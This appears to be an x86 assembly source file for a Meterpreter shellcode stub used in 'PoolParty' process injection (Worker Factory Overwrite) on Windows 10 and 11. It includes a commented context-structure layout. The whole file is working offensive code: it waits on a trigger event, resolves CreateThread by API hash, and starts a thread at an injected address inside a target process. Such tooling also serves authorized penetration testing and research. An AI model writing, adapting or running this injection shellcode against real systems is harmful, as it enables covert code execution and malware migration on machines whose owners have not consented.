;-----------------------------------------------------------------------------;
; Author: Muzaffer Umut ŞAHİN (mailatmayinlutfen[at]gmail[dot]com)
; Compatible: Windows 11, 10
; Architecture: x86
; Version: 0.1 (Jan 2026)
; Size: 206 bytes
; Build: >build.py poolparty
;-----------------------------------------------------------------------------;

; Stub helper for pool-party injection.
;
; Layout of the context block the stub reads. It is located with the
; call/pop sequence at the bottom of this file, so it must be the first bytes
; after the end of the shellcode. Every member is padded to 8 bytes, which is
; why the stub reads offsets 0, 8 and 16 below.
;typedef struct _POOLPARTYCTX
;{
; union
; {
; LPVOID lpStartAddress;
; BYTE bPadding1[8];
; } s;
; union
; {
; LPVOID lpParameter;
; BYTE bPadding2[8];
; } p;
; union
; {
; LPVOID hEventTrigger;
; BYTE bPadding2[8];
; } e;
;
;} POOLPARTYCTX, * LPPOOLPARTYCTX;
; Description:
; This stub is executed during Meterpreter migration and DLL injection. The POOLPARTYCTX must ALWAYS be allocated at the end of the shellcode;
; this is mandatory because some pool-party variants do not support argument passing. An hEventTrigger is also mandatory during migration because
; we need to wait for the OK from the previous Meterpreter before continuing execution. With other techniques (RemoteThread and APC)
; we start the process in SUSPENDED mode and then resume it; here we need to wait for an event instead.
; This shellcode is written to work with multiple PoolParty variants.
; Supported Variants:
; - Worker Factory Overwrite

[BITS 32]

push ebp
push ebx
push edi
push esi ; save the callee-preserved registers (restored in the same order at 'restore')
mov esi,esp ; remember the entry stack pointer; 'restore' resets esp from it
cld ; clear DF; presumably block_api relies on forward-direction string ops - confirm against block_api.asm
jmp _parameters ; locate POOLPARTYCTX and then block_api through the call/pop chain at the bottom of the file

_main:
pop ebp ; ebp = address of the block_api code (pushed by 'call _main'); ebx already holds &POOLPARTYCTX (set in _cb_parameters)
push -1 ; dwMilliseconds = INFINITE
push dword [ebx+16] ; hEventTrigger (ctx->e, offset 16)
push 0x601D8708 ; hash("kernel32.dll","WaitForSingleObject")
call ebp ; WaitForSingleObject(hEventTrigger, INFINITE); the result in eax is not checked
xor edi,edi ; edi = 0, reused for every NULL / 0 argument below
push edi ; lpThreadId = NULL
push edi ; dwCreationFlags = 0
push dword [ebx+8] ; lpParameter (ctx->p, offset 8)
push dword [ebx] ; lpStartAddress (ctx->s, offset 0)
push edi ; dwStackSize = 0 (default)
push edi ; lpThreadAttributes = NULL
push 0x160D6838 ; hash("kernel32.dll","CreateThread")
call ebp ; CreateThread(NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL); the returned handle in eax is neither checked nor closed here

restore:
mov esp,esi ; discard the leftover return address from 'call get_blockapi' (and anything the block_api calls may have left) in one step
pop esi
pop edi
pop ebx
pop ebp ; restore registers
ret ; return to whichever pool-party mechanism invoked the stub

get_blockapi:
call _main ; pushes the address of the block_api code that follows; _main pops it into ebp
%include "./../block/block_api.asm"

_cb_parameters:
pop ebx ; ebx = address of the byte just past the final 'call' below, i.e. &POOLPARTYCTX
call get_blockapi ; the return address pushed here is never popped; 'restore' drops it via esi

_parameters:
call _cb_parameters ; last instruction of the shellcode: its pushed return address is the start of POOLPARTYCTX